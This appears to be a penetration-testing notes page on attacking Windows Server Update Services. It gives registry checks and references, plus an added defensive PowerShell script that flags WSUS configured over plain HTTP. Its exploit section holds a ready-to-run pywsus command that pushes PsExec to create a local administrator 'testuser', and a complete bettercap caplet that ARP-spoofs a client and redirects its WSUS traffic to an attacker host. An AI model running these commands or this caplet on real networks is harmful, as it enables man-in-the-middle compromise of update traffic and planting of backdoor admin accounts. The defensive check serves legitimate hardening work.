# WSUS

* <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus>

## HTTP MitM

* <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf>
* <https://github.com/GoSecure/pywsus>
* <https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/>
* <https://www.thehacker.recipes/systems-and-services/privilege-escalation/windows/wsus-attacks>
* <https://github.com/NeffIsBack/wsuks>

Check whether the client is pointed at a WSUS server over plain HTTP:

```
PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
      WUServer    REG_SZ    http://wsus.megacorp.local:8530

PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
      UseWUServer    REG_DWORD    0x1
```
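
A defender-side version of the check above, as an added example that is not part of the original page: it classifies a host's Windows Update policy and flags WSUS URLs configured over plain HTTP, the condition the MitM references in this section depend on. `Test-WsusPolicy` and its output fields are hypothetical names, and the `https://` sample URL is constructed.

```powershell
# Added example: function and property names are hypothetical. The registry
# values are those queried above plus WUStatusServer (same policy key).
function Test-WsusPolicy {
    param(
        [string]$WUServer,        # ...\WindowsUpdate\WUServer
        [string]$WUStatusServer,  # ...\WindowsUpdate\WUStatusServer
        [int]$UseWUServer = 0     # ...\WindowsUpdate\AU\UseWUServer
    )

    $urls = [ordered]@{ WUServer = $WUServer; WUStatusServer = $WUStatusServer }
    $cleartext = @()
    foreach ($name in $urls.Keys) {
        $uri = $null
        # TryCreate returns $false for empty or malformed values instead of throwing
        if ([Uri]::TryCreate($urls[$name], [UriKind]::Absolute, [ref]$uri) -and
            $uri.Scheme -eq 'http') {
            $cleartext += "$name=$($uri.AbsoluteUri)"
        }
    }

    # The client only honours WUServer when UseWUServer is 1
    if ($UseWUServer -ne 1)                 { $status = 'WsusNotEnforced' }
    elseif ($cleartext.Count -gt 0)         { $status = 'CleartextHttp' }
    elseif ($WUServer -like 'https://*')    { $status = 'Https' }
    else                                    { $status = 'Unrecognized' }

    [pscustomobject]@{ Status = $status; CleartextUrls = $cleartext }
}

# Live host: read the policy keys (missing keys or values come back as $null)
$base = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
$wu = Get-ItemProperty -Path $base -ErrorAction SilentlyContinue
$au = Get-ItemProperty -Path "$base\AU" -ErrorAction SilentlyContinue
Test-WsusPolicy -WUServer $wu.WUServer -WUStatusServer $wu.WUStatusServer `
                -UseWUServer ([int]$au.UseWUServer)

# Offline: the values from the registry output above, then a constructed HTTPS URL
Test-WsusPolicy -WUServer 'http://wsus.megacorp.local:8530' -UseWUServer 1
Test-WsusPolicy -WUServer 'https://wsus.megacorp.local:8531' -UseWUServer 1
```

Hosts reporting `CleartextHttp` are the ones to move first when WSUS is switched to TLS and `WUServer`/`WUStatusServer` are repointed at the `https://` URL.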

Exploit:

```
$ python3 pywsus.py --host $ATTACKER_IP --port 8530 --executable /home/snovvcrash/www/PsExec64.exe --command '/accepteula /s cmd.exe /c "net user testuser Passw0rd! /add && net localgroup Administrators testuser /add"'
$ sudo ./bettercap --iface $INTERFACE --caplet wsus.cap
```

{% code title="wsus.cap" %}

```bash
# Quick recon of the network
net.probe on

# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Re-route traffic aimed at the WSUS server
set any.proxy.iface $INTERFACE
set any.proxy.protocol TCP
set any.proxy.src_address $WSUS_SERVER_IP
set any.proxy.src_port 8530
set any.proxy.dst_address $ATTACKER_IP
set any.proxy.dst_port 8530

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
any.proxy on
arp.spoof on
net.sniff on
```

{% endcode %}

## Local Proxy (LPE)

* <https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>

## WSUS + LDAPS NTLM Relay

* <https://www.gosecure.net/blog/2021/11/22/gosecure-investigates-abusing-windows-server-update-services-wsus-to-enable-ntlm-relaying-attacks/>

## Tools

### SharpWSUS

* <https://labs.nettitude.com/blog/introducing-sharpwsus/>
* <https://github.com/nettitude/SharpWSUS>


